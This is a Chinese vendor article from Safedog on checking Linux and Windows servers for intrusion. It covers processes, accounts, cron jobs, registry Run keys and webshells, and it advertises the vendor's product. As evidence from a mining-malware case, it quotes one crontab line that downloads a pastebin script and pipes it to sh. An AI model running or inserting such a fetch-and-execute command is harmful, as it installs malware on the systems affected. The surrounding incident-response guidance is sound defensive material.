怎么查看服务器是否被入侵

　　怎么查看服务器是否被入侵?越来越多的客户找到安全狗反应服务器被入侵，想知道针对服务器安全应该怎么排查。但是入侵的方式有很多，比如页面篡改、替换、跳转等，这里给大家稍微讲解一下排查的方法。

怎么查看服务器是否被入侵

　　首先，安装服务器安全狗，服务器安全狗能够帮助用户排查入侵的漏洞，修复漏洞，查杀病毒等，功能十分强大，可以有效排查和防止黑客入侵服务器。

　　服务器安全狗，永久免费使用：http://free.safedog.cn/server_safedog.html

　　多引擎，精准查杀网页木马、各类病毒

　　独有的安全狗云查杀引擎、网马引擎与专业的二进制病毒引擎结合，精确查杀各类网页木马和主流病毒。多引擎智能查杀病毒，全面保障服务器安全。

　　三层网络防护，实时保护网络安全

　　强有力的网络防护，实时监测IP和端口访问的合法性，实时拦截ARP攻击、Web攻击(抗CC)、DDOS攻击、暴力破解。

　　全面的文件/注册表保护，杜绝非法篡改

　　全面开放保护规则，同时支持监控网站目录，有效保护重要文件、目录与注册表不被篡改与删除，实时防止网站被上传网页木马。系统默认规则与用户自定义规则全支持，灵活定制，全面保护。

　　底层驱动防护，屏蔽入侵提权

　　驱动级保护，拦截更快速，有效防止未授权的非法用户登录服务器，实时阻止非法创建和修改系统帐号。

　　服务器安全加固，避免配置风险

　　全面的服务器体检，暴露安全隐患，当前系统健康情况了然于心，同时提供贴心的优化建议措施，加固服务器更简单，系统运行更快速，更安全。

怎么查看服务器是否被入侵

　　这是查看linux系统服务器是否被入侵的方法：

　　首先我们会对当前服务器的IP，以及IP的地址，linux服务器名称，服务器的版本是centos,还是redhat，服务器的当前时间，进行收集并记录到一个txt文档里，接下来再执行下一步，对当前服务器的异常网络连接以及异常的系统进程检查，主要是通过netstat -an以及-antp命令来检查服务器存在哪些异常的IP连接。并对连接的IP，进行归属地查询，如果是国外的IP，直接记录当前进程的PID值，并自动将PID的所有信息记录，查询PID所在的linux文件地址，紧接着检查当前占用CPU大于百分之30的进程，并检查该进程所在的文件夹。

　　在我们处理客户服务器被攻击的时候发现很多服务器的命令被篡改，比如正常的PS查看进程的，查询目录的 cd的命令都给篡改了，让服务器无法正常使用命令，检查服务器安全造成了困扰。对服务器的启动项进行检查，有些服务器被植入木马后门，即使重启服务器也还是被攻击，木马会自动的启动，检查linux的init.d的文件夹里是否有多余的启动文件，也可以检查时间，来判断启动项是否有问题。

　　再一个要检查的地方是服务器的历史命令，history很多服务器被黑都会留下痕迹，比如SSH登录服务器后，攻击者对服务器进行了操作，执行了那些恶意命令都可以通过history查询的到，有没有使用wget命令下载木马，或者执行SH文件。检查服务器的所有账号，以及当前使用并登录的管理员账户，tty是本地用户登录，pst是远程连接的用户登录，来排查服务器是否被黑，被攻击，也可以检查login.defs文件的uid值，判断uid的passwd来获取最近新建的管理员账户。执行cat etc/passwd命令检查是否存在异常的用户账户，包括特权账户，UID值为0.

　　最重要的是检查服务器的定时任务，前段时间某网站客户中了挖矿病毒，一直占用CPU，查看了定时任务发现每15分钟自动执行下载命令，crontab -l */15 * * * * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q-O- https://pastebin.com/raw/TS4NeUnd)|sh 代码如上，自动下载并执行SH木马文件。定时任务删都删不掉，最后通过检查系统文件查到了木马，并终止进程，强制删除。有些服务器被黑后，请立即检查2天里被修改的文件，可以通过find命令去检查所有的文件，看是否有木马后门文件，如果有可以确定服务器被黑了。

　　这是查看windows系统服务器是否被入侵的方法：

　　检查服务器的进程是不是有恶意的进程，以及管理员账号是否被恶意增加，对服务器的端口进行查看，有没有开启多余的端口，再一个对服务器的登陆日志进行检查，服务器的默认开启启动项，服务以及计划任务，检查网站是否存在木马后门，以及服务器系统是否中病毒。

　　如何查看进程?打开服务器，在cmd命令下输入tasklis，或者是右键任务管理器来进行查看进程，点显示所有用户的进程就可以，我们综合的分析，根据这个内存使用较大，CPU占用较多来初步的看下，哪些进程在不停的使用，就能大概判断出有没有异常的进程，一般来说加载到进程的都是系统后门，查看到进程详细信息使用PID来查看，再用命令findstr来查找进程调用的文件存放在哪里。

　　接下来就是查看系统是否存在其他恶意的管理员账号,cmd命令下输入net user就会列出当前服务器里的所有账号，也可以通过注册表去查看管理员账号是否被增加，注册表这里是需要在命令中输入egedit来打开注册表，找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names可以看到所有的账号名字。

　　端口方面的检查，比如一些客户服务器经常遭受攻击像3306数据库端口，21FTP端口，135,445端口，1433sql数据库端口，3389远程桌面端口，是否是对外开放，如果这些端口对外开放，很有可能利用漏洞进行攻击，入侵，还有弱口令账号密码，有些数据库的root账号密码为空，以及FTP可以匿名连接，都可以导致服务器被入侵。有些密码还是123456,111111等等。远程桌面的端口要修改掉，尽可能的防止攻击者利用暴力破解的手段对服务器进行登陆。可以对远程登陆这里做安全验证，限制IP，以及MAC，以及计算机名，这样大大的加强了服务器的安全。还要对服务器的登陆日志进行检查，看下日志是否有被清空的痕迹，跟服务器被恶意登陆的日志记录，一般来说很多攻击者都会登陆到服务器，肯定会留下登陆日志，检查事件682就可以查得到。

　　接下来要对服务器的启动项，服务以及计划任务进行检查，一般攻击者提权入侵服务器后，都会在服务器里植入木马后门，都会插入到启动项跟计划任务，或者服务当中去，混淆成系统服务，让管理员无法察觉，使用msconfig命令对服务器进行查看。

　　注册表这里要检查这几项：

　　HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\

　　HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ HKEY_CLASSES_ROOT\exefile\shell\open\command

　　HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\

　　最重要的是对服务里的网站代码进行安全检测，对比之前网站的备份文件，看下有没有多出一些可疑的代码文件，图片格式的可以忽略，主要是一些asp，aspx，php，jsp等脚本执行文件，对代码查看是否含有eval等特殊字符的一句话木马webshell,还有些加密的文件，都有可能是网站木马文件，网站的首页代码，标题描述，是否被加密，一些你看不懂的字符，这一般是网站被入侵了，一步一步导致的服务器被攻击。

　　怎么查看服务器是否被入侵，可以根据自己的系统按照上面介绍的方式去排查，看你的服务器是否被入侵了。如果对于服务器安全攻防并不了解的朋友，也可以直接安装服务器安全狗进行系统检测，或者直接向安全狗咨询，我们会尽力为您解答。